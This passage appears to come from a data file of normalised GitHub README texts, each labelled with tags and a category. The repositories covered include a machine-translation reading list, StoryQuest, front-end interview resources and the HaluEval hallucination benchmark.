acl 2020 shamil chollampatt raymond hendy susanto liling tan ewa szymanska 2020 can automatic post editing improve nmt https www aclweb org anthology 2020 emnlp main 217 in proceedings of emnlp 2020 h3 id poetry translation poetry translation h3 marjan ghazvininejad yejin choi and kevin knight 2018 neural poetry translation http aclweb org anthology n18 2011 in proceedings of naacl 2018 citation https scholar google com hk scholar cites 4597758342230970450 as sdt 2005 sciodt 0 5 hl en 1 h3 id eco friendly eco friendly h3 emma strubell ananya ganesh and andrew mccallum 2019 energy and policy considerations for deep learning in nlp https www aclweb org anthology p19 1355 in proceedings of acl 2019 h3 id compositional generalization compositional generalization h3 yafu li yongjing yin yulong chen yue zhang 2021 on compositional generalization of neural machine translation https aclanthology org 2021 acl long 368 in proceedings of acl 2021 verna dankers elia bruni dieuwke hupkes 2022 the paradox of the compositionality of natural language a neural machine translation case study https aclanthology org 2022 acl long 286 in proceedings of acl 2022 hao zheng mirella lapata 2022 disentangled sequence to sequence learning for compositional generalization https aclanthology org 2022 acl long 293 in proceedings of acl 2022 verna dankers christopher lucas ivan titov 2022 can transformer be too compositional analysing idiom processing in neural machine translation https aclanthology org 2022 acl long 252 in proceedings of acl 2022 h3 id endangered endangered language revitalization h3 shiyue zhang benjamin frey mohit bansal 2020 chren cherokee english machine translation for endangered language revitalization https www aclweb org anthology 2020 emnlp main 43 in proceedings of emnlp 2020 tahmid hasan abhik bhattacharjee kazi samin masum hasan madhusudan basak m sohel rahman rifat shahriyar 2020 not low resource anymore aligner ensembling batch filtering and new datasets for bengali english machine translation https www aclweb org anthology 2020 emnlp main 207 in proceedings of emnlp 2020 h2 id word translation word translation h2 tomas mikolov quoc v le and ilya sutskever 2013 exploiting similarities among languages for machine translation https arxiv org pdf 1309 4168 pdf arxiv 1309 4168 citation https scholar google com hk scholar cites 18389495985810631724 as sdt 2005 sciodt 0 5 hl en 581 chao xing dong wang chao liu and yiye lin 2015 normalized word embedding and orthogonal transform for bilingual word translation http aclweb org anthology n15 1104 in proceedings of naacl 2015 citation https scholar google com hk scholar hl zh cn as sdt 2005 sciodt 0 5 cites 4009320309746318198 scipsc 89 georgiana dinu angeliki lazaridou and marco baroni 2015 improving zero shot learning by mitigating the hubness problem https arxiv org pdf 1412 6568 pdf in proceedings of iclr 2015 citation https scholar google com hk scholar cites 4810137765860435505 as sdt 2005 sciodt 0 5 hl en 110 meng zhang yang liu huanbo luan maosong sun tatsuya izuha and jie hao 2016 building earth mover s distance on bilingual word embeddings for machine translation http www aaai org ocs index php aaai aaai16 paper download 12227 12035 in proceedings of aaai 2016 citation https scholar google com hk scholar cites 10787724557107708547 as sdt 2005 sciodt 0 5 hl en 11 meng zhang yang liu huanbo luan yiqun liu and maosong sun 2016 inducing bilingual lexica from non parallel data with earth mover s distance regularization http aclweb org anthology c16 1300 in proceedings of coling 2016 citation https scholar google com hk scholar cites 7442971885961632428 as sdt 2005 sciodt 0 5 hl en 4 ivan vuli and anna korhonen on the role of seed lexicons in learning bilingual word embeddings http www aclweb org anthology p16 1024 in proceedings of acl 2016 citation https scholar google com hk scholar cites 9848186834020452809 as sdt 2005 sciodt 0 5 hl en 39 mikel artetxe gorka labaka and eneko agirre 2016 learning principled bilingual mappings of word embeddings while preserving monolingual invariance http www aclweb org anthology d16 1250 in proceedings of emnlp 2016 citation https scholar google com hk scholar cites 5308709105842309671 as sdt 2005 sciodt 0 5 hl en 73 meng zhang haoruo peng yang liu huanbo luan and maosong sun bilingual lexicon induction from non parallel data with minimal supervision http www aaai org ocs index php aaai aaai17 paper download 14682 14264 in proceedings of aaai 2017 citation https scholar google com hk scholar cites 6351287463037630922 as sdt 2005 sciodt 0 5 hl en 11 ann irvine and chris callison burch 2017 a comprehensive analysis of bilingual lexicon induction http aclweb org anthology j17 2001 computational linguistics citation https scholar google com hk scholar cites 9284068492500255032 as sdt 2005 sciodt 0 5 hl en 12 mikel artetxe gorka labaka and eneko agirre 2017 learning bilingual word embeddings with almost no bilingual data http aclweb org anthology p17 1042 in proceedings of acl 2017 citation https scholar google com hk scholar cites 17614535864871662614 as sdt 2005 sciodt 0 5 hl en 62 meng zhang yang liu huanbo luan and maosong sun 2017 adversarial training for unsupervised bilingual lexicon induction http aclweb org anthology p17 1179 in proceedings of acl 2017 citation https scholar google com scholar um 1 ie utf 8 lr cites 1858752500147406961 41 geert heyman ivan vuli and marie francine moens 2017 bilingual lexicon induction by learning to combine word level and character level representations http aclweb org anthology e17 1102 in proceedings of eacl 2017 citation https scholar google com scholar cites 585284476576929954 as sdt 2005 sciodt 0 5 hl en 9 bradley hauer garrett nicolai and grzegorz kondrak 2017 bootstrapping unsupervised bilingual lexicon induction http aclweb org anthology e17 2098 in proceedings of eacl 2017 citation https scholar google com scholar cites 12378647251883332742 as sdt 2005 sciodt 0 5 hl en 5 yunsu kim julian schamper and hermann ney 2017 unsupervised training for large vocabulary translation using sparse lexicon and word classes http aclweb org anthology e17 2103 in proceedings of eacl 2017 citation https scholar google com scholar um 1 ie utf 8 lr cites 10713109281510942659 1 derry tanti wijaya brendan callahan john hewitt jie gao xiao ling marianna apidianaki and chris callison burch 2017 learning translations via matrix completion http aclweb org anthology d17 1152 in proceedings of emnlp 2017 citation https scholar google com scholar cites 9020955741604455257 as sdt 2005 sciodt 0 5 hl en 3 meng zhang yang liu huanbo luan and maosong sun 2017 earth mover s distance minimization for unsupervised bilingual lexicon induction http aclweb org anthology d17 1207 in proceedings of emnlp 2017 citation https scholar google com scholar cites 8228362677106813515 as sdt 2005 sciodt 0 5 hl en 26 ndapandula nakashole and raphael flauger 2017 knowledge distillation for bilingual dictionary induction http aclweb org anthology d17 1264 in proceedings of emnlp 2017 citation https scholar google com scholar cites 1036105547945298329 as sdt 2005 sciodt 0 5 hl en 5 hanan aldarmaki mahesh mohan and mona diab 2018 unsupervised word mapping using structural similarities in monolingual embeddings http aclweb org anthology q18 1014 transactions of the association for computational linguistics citation https scholar google com scholar cites 4781812228167043431 as sdt 2005 sciodt 0 5 hl en 5 guillaume lample alexis conneau marc aurelio ranzato ludovic denoyer and herv j gou 2018 word translation without parallel data https openreview net pdf id h196sainb in proceedings of iclr 2018 citation https scholar google com scholar cites 8622718096243524923 as sdt 2005 sciodt 0 5 hl en 11 fabienne braune viktor hangya tobias eder and alexander fraser 2018 evaluating bilingual word embeddings on the long tail http aclweb org anthology n18 2030 in proceedings of naacl 2018 citation https scholar google com scholar cites 1773448771543494989 as sdt 2005 sciodt 0 5 hl en 1 ndapa nakashole and raphael flauger 2018 characterizing departures from linearity in word translation http aclweb org anthology p18 2036 in proceedings of acl 2018 citation https scholar google com scholar cites 669635789435605162 as sdt 2005 sciodt 0 5 hl en 3 anders s gaard sebastian ruder and ivan vuli 2018 on the limitations of unsupervised bilingual dictionary induction http aclweb org anthology p18 1072 in proceedings of acl 2018 citation https scholar google com scholar cites 1427533216601294786 as sdt 2005 sciodt 0 5 hl en 17 mikel artetxe gorka labaka and eneko agirre 2018 a robust self learning method for fully unsupervised cross lingual mappings of word embeddings http aclweb org anthology p18 1073 in proceedings of acl 2018 citation https scholar google com scholar cites 7012967033921106213 as sdt 2005 sciodt 0 5 hl en 17 parker riley and daniel gildea 2018 orthographic features for bilingual lexicon induction http aclweb org anthology p18 2062 in proceedings of acl 2018 amir hazem and emmanuel morin 2018 leveraging meta embeddings for bilingual lexicon extraction from specialized comparable corpora http aclweb org anthology c18 1080 in proceedings of coling 2018 lifu huang kyunghyun cho boliang zhang heng ji and kevin knight 2018 multi lingual common semantic space construction via cluster consistent word embedding http aclweb org anthology d18 1023 in proceedings of emnlp 2018 xilun chen and claire cardie 2018 unsupervised multilingual word embeddings http aclweb org anthology d18 1024 in proceedings of emnlp 2018 citation https scholar google com scholar cites 15847135808149408064 as sdt 2005 sciodt 0 5 hl en 4 ta chung chi and yun nung chen 2018 cluse cross lingual unsupervised sense embeddings http aclweb org anthology d18 1025 in proceedings of emnlp 2018 citation https scholar google com scholar cites 1931895311858153391 as sdt 2005 sciodt 0 5 hl en 1 yerai doval jose camacho collados luis espinosa anke and steven schockaert 2018 improving cross lingual word embeddings by meeting in the middle http aclweb org anthology d18 1027 in proceedings of emnlp 2018 sebastian ruder ryan cotterell yova kementchedjhieva and anders s gaard 2018 a discriminative latent variable model for bilingual lexicon induction http aclweb org anthology d18 1042 in proceedings of emnlp 2018 yedid hoshen and lior wolf 2018 non adversarial unsupervised word translation http aclweb org anthology d18 1043 in proceedings of emnlp 2018 ndapa nakashole 2018 norma neighborhood sensitive maps for multilingual word embeddings http aclweb org anthology d18 1047 in proceedings of emnlp 2018 mareike hartmann yova kementchedjhieva and anders s gaard 2018 why is unsupervised alignment of english embeddings from different algorithms so hard http aclweb org anthology d18 1056 in proceedings of emnlp 2018 zi yi dou zhi hao zhou and shujian huang 2018 unsupervised bilingual lexicon induction via latent variable models http aclweb org anthology d18 1062 in proceedings of emnlp 2018 tanmoy mukherjee makoto yamada and timothy hospedales 2018 learning unsupervised word translations without adversaries http aclweb org anthology d18 1063 in proceedings of emnlp 2018 david alvarez melis and tommi jaakkola 2018 gromov wasserstein alignment of word embedding spaces http aclweb org anthology d18 1214 in proceedings of emnlp 2018 ruochen xu yiming yang naoki otani and yuexin wu 2018 unsupervised cross lingual transfer of word embedding spaces http aclweb org anthology d18 1268 in proceedings of emnlp 2018 citation https scholar google com scholar um 1 ie utf 8 lr cites 15320274773511615227 2 armand joulin piotr bojanowski tomas mikolov herv j gou and edouard grave 2018 loss in translation learning bilingual word mapping with a retrieval criterion http aclweb org anthology d18 1330 in proceedings of emnlp 2018 citation https scholar google com scholar cites 437763240249389525 as sdt 2005 sciodt 0 5 hl en 2 sebastian ruder ivan vuli and anders s gaard 2019 a survey of cross lingual word embedding models https arxiv org pdf 1706 04902 pdf journal of artificial intelligence research citation https scholar google com scholar cites 2174368482827457639 as sdt 2005 sciodt 0 5 hl en 22 pratik jawanpuria arjun balgovind anoop kunchukuttan and bamdev mishra 2019 learning multilingual word embeddings in latent metric space a geometric approach https arxiv org pdf 1808 08773 transactions of the association for computational linguistics citation https scholar google com scholar cites 3887586742254907953 as sdt 2005 sciodt 0 5 hl en 3 tasnim mohiuddin and shafiq joty 2019 revisiting adversarial autoencoder for unsupervised word translation with cycle consistency and improved training https arxiv org pdf 1904 04116 pdf in proceedings of naacl 2019 chunting zhou xuezhe ma di wang and graham neubig 2019 density matching for bilingual word embedding https arxiv org pdf 1904 02343 pdf in proceedings of naacl 2019 noa yehezkel lubin jacob goldberger and yoav goldberg 2019 aligning vector spaces with noisy supervised lexicons https arxiv org pdf 1903 10238 pdf in proceedings of naacl 2019 tal schuster ori ram regina barzilay and amir globerson 2019 cross lingual alignment of contextual word embeddings with applications to zero shot dependency parsing https arxiv org pdf 1902 09492 pdf in proceedings of naacl 2019 hanan aldarmaki and mona diab 2019 context aware cross lingual mapping https arxiv org pdf 1903 03243 pdf in proceedings of naacl 2019 yoshinari fujinuma jordan boyd graber and michael j paul 2019 a resource free evaluation metric for cross lingual word embeddings based on graph modularity https arxiv org pdf 1906 01926 in proceedings of acl 2019 mozhi zhang keyulu xu ken ichi kawarabayashi stefanie jegelka and jordan boyd graber 2019 are girls neko or sh jo cross lingual alignment of non isomorphic embeddings with iterative normalization https arxiv org pdf 1906 01622 in proceedings of acl 2019 aitor ormazabal mikel artetxe gorka labaka aitor soroa and eneko agirre 2019 analyzing the limitations of cross lingual word embedding mappings https arxiv org pdf 1906 05407 in proceedings of acl 2019 takashi wada tomoharu iwata and yuji matsumoto 2019 unsupervised multilingual word embedding with limited resources using neural language models https www aclweb org anthology p19 1300 in proceedings of acl 2019 pengcheng yang fuli luo peng chen tianyu liu and xu sun 2019 maam a morphology aware alignment model for unsupervised bilingual lexicon induction https www aclweb org anthology p19 1308 in proceedings of acl 2019 benjamin marie and atsushi fujita 2019 unsupervised joint training of bilingual word embeddings https www aclweb org anthology p19 1312 in proceedings of acl 2019 mikel artetxe gorka labaka and eneko agirre 2019 bilingual lexicon induction through unsupervised machine translation https www aclweb org anthology p19 1494 in proceedings of acl 2019 elias stengel eskin tzu ray su matt post and benjamin van durme 2019 a discriminative neural model for cross lingual word alignment https arxiv org pdf 1909 00444 in proceedings of emnlp 2019 ivan vuli goran glava roi reichart and anna korhonen 2019 do we really need fully unsupervised cross lingual embeddings https arxiv org pdf 1909 01638 in proceedings of emnlp 2019 paula czarnowska sebastian ruder edouard grave ryan cotterell and ann copestake 2019 don t forget the long tail a comprehensive analysis of morphological generalization in bilingual lexicon induction https arxiv org pdf 1909 02855 in proceedings of emnlp 2019 yova kementchedjhieva mareike hartmann and anders s gaard 2019 lost in evaluation misleading benchmarks for bilingual dictionary induction https arxiv org pdf 1909 05708 in proceedings of emnlp 2019 mareike hartmann yova kementchedjhieva anders s gaard 2019 comparing unsupervised word translation methods step by step https papers nips cc paper 8836 comparing unsupervised word translation methods step by step in proceedings of neurips 2019 steven cao nikita kitaev dan klein 2020 multilingual alignment of contextual word representations https openreview net forum id r1xcmybtps in proceedings of iclr 2020 g bor berend 2020 massively multilingual sparse word representations https openreview net forum id hyeytgrfpb in proceedings of iclr 2020 xu zhao zihao wang yong zhang and hao wu 2020 a relaxed matching procedure for unsupervised bli https www aclweb org anthology 2020 acl main 274 in proceedings of acl 2020 mladen karan ivan vuli anna korhonen and goran glava 2020 classification based self learning for weakly supervised bilingual lexicon induction https www aclweb org anthology 2020 acl main 618 in proceedings of acl 2020 shuo ren shujie liu ming zhou and shuai ma 2020 a graph based coarse to fine method for unsupervised bilingual lexicon induction https www aclweb org anthology 2020 acl main 318 in proceedings of acl 2020 pratik jawanpuria mayank meghwanshi and bamdev mishra 2020 geometry aware domain adaptation for unsupervised alignment of word embeddings https www aclweb org anthology 2020 acl main 276 in proceedings of acl 2020 tasnim mohiuddin m saiful bari shafiq joty 2020 lnmap departures from isomorphic assumption in bilingual lexicon induction through non linear mapping in latent space https www aclweb org anthology 2020 emnlp main 215 in proceedings of emnlp 2020 h2 id wmt winners wmt winners h2 wmt http www statmt org wmt19 is the most important annual international competition on machine translation we collect the competition results http matrix statmt org on the news translation task since wmt 2016 the first conference of machine translation and summarize the techniques used in the systems with the top performance currently we focus on four directions zh en en zh de en and en de the summarized algorithms might be incomplete your suggestions are welcome h3 id wmt19 wmt 2019 h3 the winner of zh en http matrix statmt org matrix systems list 1901 de en http matrix statmt org matrix systems list 1902 and en de http matrix statmt org matrix systems list 1909 microsoft system report yingce xia xu tan fei tian fei gao di he weicong chen yang fan linyuan gong yichong leng renqian luo yiren wang lijun wu jinhua zhu tao qin and tie yan liu 2019 microsoft research asia s systems for wmt19 http www statmt org wmt19 pdf wmt0048 pdf in proceedings of the fourth conference on machine translation shared task papers news microsoft research asia msra leads in 2019 wmt international machine translation competition https news microsoft com apac 2019 05 22 microsoft research asia msra leads in 2019 wmt international machine translation competition techniques yiren wang yingce xia tianyu he fei tian tao qin chengxiang zhai and tie yan liu 2019 multi agent dual learning https openreview net pdf id hyghn2a5tm in proceedings of iclr 2019 kaitao song xu tan tao qin jianfeng lu and tie yan liu 2019 mass masked sequence to sequence pre training for language generation https arxiv org pdf 1905 02450 in proceedings of icml 2019 renqian luo fei tian tao qin enhong chen and tie yan liu 2018 neural architecture optimization https papers nips cc paper 8007 neural architecture optimization pdf in proceedings of neurips 2018 jinhua zhu fei gao lijun wu yingce xia tao qin wengang zhou xueqi cheng tie yan liu 2019 soft contextual data augmentation for neural machine translation https arxiv org pdf 1905 10523 pdf in proceedings of acl 2019 the winner of en zh http matrix statmt org matrix systems list 1908 patech system report coming soon techniques transformer back translation reranking ensemble h3 id wmt18 wmt 2018 h3 the winner of zh en http matrix statmt org matrix systems list 1892 tencent system report mingxuan wang li gong wenhuan zhu jun xie and chao bian 2018 tencent neural machine translation systems for wmt18 https www aclweb org anthology w18 6429 in proceedings of the third conference on machine translation shared task papers techniques rnmt transformer bpe rerank ensemble outputs with 48 features including t2t r2l t2t l2r rnn l2r rnn r2l etc back translation joint train with english to chinese systems fine tuning with selected data knowledge distillation the winner of en zh http matrix statmt org matrix systems list 1893 gtcom system report chao bei hao zong yiming wang baoyong fan shiqi li and conghu yuan 2018 an empirical study of machine translation for the shared task of wmt18 https www aclweb org anthology w18 6404 in proceedings of the third conference on machine translation shared task papers techniques transformer back translation data filtering by rules language models and translation models bpe greedy ensemble decoding fine tuning with newstest2017 back translation the winner of de en http matrix statmt org matrix systems list 1880 rwth aachen university system report julian schamper jan rosendahl parnia bahar yunsu kim arne nix and hermann ney 2018 the rwth aachen university supervised machine translation systems for wmt 2018 https www aclweb org anthology w18 6426 in proceedings of the third conference on machine translation shared task papers techniques ensemble of 3 strongest transformer models data selection bpe fine tuning important hyperparameters batch size and model dimension the winner of en de http matrix statmt org matrix systems list 1881 microsoft system report marcin junczys dowmunt 2018 microsoft s submission to the wmt2018 news translation task how i learned to stop worrying and love the data https www aclweb org anthology w18 6415 in proceedings of the third conference on machine translation shared task papers techniques marian transformer big bpe ensemble data filtering domain weighted paracrawl original data decoder time ensemble with in domain transformer style language model reranking with right to left transformer big models h3 id wmt17 wmt 2017 h3 the winner of zh en http matrix statmt org matrix systems list 1878 sogou system report yuguang wang shanbo cheng liyang jiang jiajun yang wei chen muze li lin shi yanfeng wang and hongtao yang 2017 sogou neural machine translation systems for wmt17 https www aclweb org anthology w17 4742 in proceedings of the second conference on machine translation shared task papers techniques encoder decoder with attention bpe reranking r2l t2s n gram language models tagging model name entity translation ensemble the winner of en zh http matrix statmt org matrix systems list 1879 de en http matrix statmt org matrix systems list 1868 and en de http matrix statmt org matrix systems list 1869 university of edinburgh system report rico sennrich alexandra birch anna currey ulrich germann barry haddow kenneth heafield antonio valerio miceli barone and philip williams 2017 the university of edinburgh s neural mt systems for wmt17 https www aclweb org anthology w17 4739 in proceedings of the second conference on machine translation shared task papers techniques encoder decoder with attention deep model layer normalization weight tying back translation bpe reranking l2r r2l ensemble h3 id wmt16 wmt 2016 h3 the winner of de en http matrix statmt org matrix systems list 1846 university of regensburg system report failed to find it techniques failed to find it the winner of en de http matrix statmt org matrix systems list 1846 university of edinburgh system report edinburgh neural machine translation systems for wmt 16 http www aclweb org anthology w16 2323 in proceedings of the first conference on machine translation shared task papers techniques encoder decoder with attention back translation bpe reranking r2l ensemble
machine-translation reading-list
ai
Computer-Vision-Face-Recognition-Quick-Starter-in-Python
computer vision face recognition quick starter in python computer vision face recognition quick starter in python video published by packt
ai
storyquest
storyquest this is storyquest a game book development platform complete with a web based editor a mobile client and an e reader export story editor screenshots combined jpg raw true story editor it is a feature rich web based development suite and mobile client for mobile augmented books with storyquest you can create adventure e books and interactive fiction that contain branching storylines audio images illustrations video and interactive javascript based content storyquest delivers ready to deploy app archives for various platforms including ios android chromeos and can export books for e readers like kindle or kobo story client screenshots client combined jpg raw true story client storyquest is currently in development and has reached beta stage feel free to comment or try caution documentation is somewhat sparse at the moment we re woking on this building running and usage see the storyquest wiki https github com michaelkleinhenz storyquest wiki for instructions on how to build and run storyquest and on how to create gamebooks with the platform license storyquest copyright copy 2016 questor gmbh berlin permission is hereby granted free of charge to any person obtaining a copy of this software and associated documentation files the software to deal in the software without restriction including without limitation the rights to use copy modify merge publish distribute sublicense and or sell copies of the software and to permit persons to whom the software is furnished to do so subject to the following conditions the above copyright notice and this permission notice shall be included in all copies or substantial portions of the software the software is provided as is without warranty of any kind express or implied including but not limited to the warranties of merchantability fitness for a particular purpose and noninfringement in no event shall the authors or copyright holders be liable for any claim damages or other liability whether in an action of contract tort or otherwise arising from out of or in connection with the software or the use or other dealings in the software
front_end
5LN708
code for machine learning in natural language processing 5ln708 this repo contains material i ve written for the course machine learning in natural language processing 7 5 ects 5ln708 at uppsala university the code here is not intended to be a full course on its own but a place where i publish code shown in the lectures some exercises and notebooks for the assignments enrolled students can find slides etc at https uppsala instructure com courses 74791
ai
Frontend-Interview-Preparation-for-Interns-and-Junior-Developers
frontend interview preparation for interns junior developers click if you like this repository pull requests are highly appreciated please contribute your interview preparation notes here special thanks to those whose contributions have been shared here and those who are contributing here img src https i ibb co dvvgxnt 1635604147457 jpg height 100 width 35 interview preparation process decoding the front end interview process dev to https dev to emmabostian decoding the front end interview process 14dl how to prepare for frontend developer interviews workat tech https workat tech frontend development article prepare for frontend developer interview sblagrzufdx3 cracking the front end interview freecodecamp org https www freecodecamp org news cracking the front end interview 9a34cd46237 how to prepare for software engineering interview youtube com https youtu be dcfshecnkw8 how to write a resume of a software engineer youtube com https youtu be elgk9nrtyss how to write a cover letter of a web developer zety com https zety com blog web developer cover letter example html css basic practice revision html w3schools com https www w3schools com html default asp revision css w3schools com https www w3schools com css default asp responsive web design freecodecamp org https www freecodecamp org learn responsive web design basic html css interview questions youtube com https youtu be cswc4hgmjcm html css top questions answers top 50 html interview q a edureka co https www edureka co blog interview questions top 50 html interview questions and answers top 50 css interview q a edureka co https www edureka co blog interview questions css interview questions most html interview q a interviewbit com https www interviewbit com html interview questions most css interview q a interviewbit com https www interviewbit com css interview questions top 55 html interview q a fullstack cafe https www fullstack cafe interview questions html5 top 50 css interview q a fullstack cafe https www fullstack cafe interview questions css javascript basic practice revision javascript w3schools com https www w3schools com js default asp hands on javascript zonayed js org https zonayed js org recap javascript core concepts youtube com https youtube com playlist list plhiz4m8vcp9nflbo9a0pzulscg xc7dkq recap modern javascript es6 concepts youtube com https www youtube com playlist list plhiz4m8vcp9mfjmrp9eehwkarbi0wdgxg javascript technical interview series youtube com https www youtube com playlist list plwgdquzwnop0vvqpvpa3ccqtjpllpwtn8 advanced theoretical javascript codedamn com https codedamn com learn advanced theoritical js cheatsheets of javascript codecademy com https www codecademy com learn introduction to javascript modules learn javascript introduction cheatsheet javascript top questions answers top 50 javascript interview q a edureka co https www edureka co blog interview questions javascript interview questions most asked 100 javascript interview q a hashnode dev https alimammiya hashnode dev 100 most asked javascript interview questions and answers part 1 top 145 javascript interview q a fullstack cafe https www fullstack cafe interview questions javascript top 10 javascript interview q a medium com https javascript plainenglish io top 10 javascript interview questions 9343421fe4e2 10 most asked es6 interview q a geeksforgeeks org https www geeksforgeeks org 10 most asked es6 interview questions answers for developers most javascript interview q a interviewbit com https www interviewbit com javascript interview questions javascript interview questions answers github com https github com sudheerj javascript interview questions javascript interview handbook q a frontendinterviewhandbook com https frontendinterviewhandbook com en javascript questions react js basic practice revision react js w3schools com https www w3schools com react default asp recap react js core concepts youtube com https www youtube com playlist list plhiz4m8vcp9m6hvqv7a36cp8lkzyhiepr react interview questions scrimba com https scrimba com learn reactinterview front end development libraries freecodecamp org https www freecodecamp org learn front end libraries 11 advanced react interview questions medium com https tapajyoti bose medium com 11 advanced react interview questions you should absolutely know with detailed answers e306083ecb7d cheatsheets of react js codecademy com https www codecademy com learn react 101 modules react 101 jsx u cheatsheet react js top questions answers top 50 react js interview q a edureka co https www edureka co blog interview questions react interview questions top 155 react js interview q a fullstack cafe https www fullstack cafe interview questions react 21 essential react js interview q a toptal com https www toptal com react interview questions 7 most asked react js interview q a geeksforgeeks org https www geeksforgeeks org 7 most asked reactjs interview questions answers most react js interview q a interviewbit com https www interviewbit com react interview questions react js interview questions answers github com https github com sudheerj reactjs interview questions top 4 mistakes in react interviews dev to https dev to andyrewlee top 4 mistakes in react interviews b4i frontend interview questions answers 100 front end interview questions challenge udemy com https www udemy com course 100 front end interview questions challenge 50 common front end developer interview q a fullstack cafe https www fullstack cafe blog front end developer interview questions list of front end interview q a frontendmasters com https frontendmasters com books front end handbook 2018 practice interview q html interview question answers for front end developer thatjsdude com https thatjsdude com interview clearing your front end job interview javascript codeburst io https codeburst io clearing your front end job interview javascript d5ec896adda4 front end developer interview questions github com https github com h5bp front end developer interview questions technical interviewing for front end engineers frontendmasters com https frontendmasters com courses interviewing frontend interview questions for web development codedamn com https codedamn com learn web development interview frontend interview cheatsheet itnext io https itnext io frontend interview cheatsheet that helped me to get offer on amazon and linkedin cba9584e33c7 amazon front end engineer interview prep github com https github com senayyakut amazon front end engineer interview prep backend interview questions answers top 50 node js interview q a edureka co https www edureka co blog interview questions top node js interview questions 2016 most 25 node js interview q a guru99 com https www guru99 com node js interview questions html most asked node js interview q a interviewbit com https www interviewbit com node js interview questions top 20 mongodb interview q a guru99 com https www guru99 com mongodb interview questions html 66 mern stack interview q a fullstack cafe https www fullstack cafe blog mern stack interview questions crack your mern interview with these questions dev to https dev to commentme crack your mern interview with these questions 3ji3 computer science interview questions answers recap object oriented programming core concepts youtube com https www youtube com playlist list pl xxuzqn0xvcqnhqtxzs9lbenrmg4ajmg four basics of object oriented programming indeed com https www indeed com career advice career development what is object oriented programming recap data structure algorithms core concepts youtube com https www youtube com playlist list plym69wpbtiieoesltwgusvny9hdwbjit revision data structure algorithms programiz com https www programiz com dsa data structure algorithms course with javascript youtube com https www youtube com playlist list pl hlkez9xcsoi5thydzipbj2pedzop7vx 25 essential computer science interview q a educba com https www educba com computer science interview questions top 20 computer science interview q a indeed com https www indeed com career advice interviewing computer science interview questions recap 7 most important software design patterns medium com https medium com educative the 7 most important software design patterns d60e546afb0e practice practical technical coding challenges algorithm and data structures problem practice leetcode com https leetcode com front end coding problem practice bigfrontend dev https bigfrontend dev html css javascript problem practice acefrontend com https www acefrontend com css specific problem practice cssbattle dev https cssbattle dev project based problem practice frontendmentor io https www frontendmentor io challenges behavioral interview questions answers traditional behavioural hr interview q a interviewbit com https www interviewbit com hr interview questions 10 behavioral interview q a for software engineers indeed com https www indeed com career advice interviewing software engineer behavioral interview questions top 8 behavioral interview questions and answers careerkarma https careerkarma com blog behavioral interview questions 45 behavioral q a during non technical interview devskiller com https devskiller com 45 behavioral questions to use during non technical interview with developers mock interview examples front end mock technical interview youtube com https youtu be vomucmmonye mock react job interview youtube com https youtu be zv373vas4um mock interview junior developer youtube com https youtu be eo7sl1byxoe mock interview mid level react js dev youtube com https youtu be clzywfmuc 0 mock live software engineering coding interview youtube com https youtu be hqdtpgsiqvg reactjs interview playlist reactjs javascript frontend youtube com https www youtube com playlist list plqbfzb0lw6gdyaqlvsgkkunqzgx4chyn0 interview experience recruitment stories unacademy interview experience rajatgupta xyz https rajatgupta xyz unacademy interview recruitment process at brain station 23 tahanima github io https tahanima github io 2020 06 21 recruitment stories experience of proteeti at bs23 recruitment process at newscred tahanima github io https tahanima github io 2021 02 17 recruitment stories experience of tahmid at newscred recruitment process at selise tahanima github io https tahanima github io 2021 05 21 recruitment stories experience of subhashis at selise recruitment process at cefalo tahanima github io https tahanima github io 2021 05 03 recruitment stories experience of asma at cefalo recruitment process at shopup tahanima github io https tahanima github io 2020 12 25 recruitment stories experience of fahad at shopup recruitment process at kona software lab tahanima github io https tahanima github io 2021 04 02 recruitment stories experience of montaser at kona recruitment process at relisource tahanima github io https tahanima github io 2020 12 10 recruitment stories experience of khairul at relisource recruitment process at enosis tahanima github io https tahanima github io 2020 06 25 recruitment stories experience of sabera at enosis recruitment process at infolytx tahanima github io https tahanima github io 2020 05 09 recruitment stories experience of jaber at infolytx recruitment process at dynamic solution innovators tahanima github io https tahanima github io 2020 06 15 recruitment stories experience of afrida at dsi contributing contributions are always welcome see contributing md for ways to get started please adhere to this project s code of conduct
frontend-interview interview-preparation frontend-interview-questions frontend-webdevelopment html-css-javascript html-interview-questions css-interview-questions javascript-interview-questions react-interview-questions interview javascript interview-questions computer-science front-end
front_end
FPGA_design_course1
fpga design course1 project completed during the course an introduction to fpga design for embedded systems this is part of a course on coursera please adhere to the honor code
os
HaluEval
halueval a hallucination evaluation benchmark for llms this is the repo for our paper halueval a large scale hallucination evaluation benchmark for large language models https arxiv org abs 2305 11747 the repo contains the 35k data data release used for evaluating the llm the code for generating the data data generation process the code for evaluating the model evaluation the code for analyzing the model analysis overview halueval includes 5 000 general user queries with chatgpt responses and 30 000 task specific examples from three tasks i e question answering knowledge grounded dialogue and text summarization for general user queries we adopt the 52k instruction tuning dataset from alpaca https github com tatsu lab stanford alpaca to further screen user queries where llms are most likely to produce hallucinations we use chatgpt to sample three responses for each query and finally retain the queries with low similarity responses for human labeling furthermore for the task specific examples in halueval we design an automatic approach to generate hallucinated samples first based on existing task datasets e g hotpotqa as seed data we design task specific instructions for chatgpt to generate hallucinated samples in two methods i e one pass and conversational second to select the most plausible and difficult hallucinated sample for llms evaluation we elaborate the filtering instruction enhanced by ground truth examples and leverage chatgpt for sample selection a href https github com rucaibox halueval target blank img src assets pipeline png alt halueval style width 90 min width 300px display block margin auto a data release the directory data data contains 35k generated and human annotated hallucinated samples we used in our experiments there are four json files as follows qa data json data qa data json 10k hallucinated samples for qa based on hotpotqa https hotpotqa github io as seed data for each sample dictionary the fields knowledge question and right answer refer to the knowledge from wikipedia question text and ground truth answer collected from hotpotqa the field hallucinated answer is the generated hallucinated answer correspondingly dialogue data json data dialogue data json 10k hallucinated samples for dialogue based on opendialkg https github com facebookresearch opendialkg as seed data for each sample dictionary the fields knowledge dialogue history and right response refer to the knowledge from wikipedia dialogue history and ground truth response collected from opendialkg the field hallucinated response is the generated hallucinated response correspondingly summarization data json data summarization data json 10k hallucinated samples for summarization based on cnn daily mail https github com abisee cnn dailymail as seed data for each sample dictionary the fields document and right summary refer to the document and ground truth summary collected from cnn daily mail the field hallucinated summary is the generated hallucinated summary correspondingly general data json data general data json 5k human annotated samples for chatgpt responses to general user queries from alpaca https github com tatsu lab stanford alpaca for each sample dictionary the fields user query chatgpt response and hallucination label refer to the posed user query chatgpt response and hallucination label yes no annotated by humans based on these data you can evaluate the ability of llms to recognize hallucinations and analyze what type of contents topics llms tend to hallucinate or fail to recognize the contained hallucination data generation process we executed the data generation pipeline via chatgpt according to the following steps first we download the training sets of hotpotqa opendialkg and cnn daily mail cd generation wget http curtis ml cmu edu datasets hotpot hotpot train v1 1 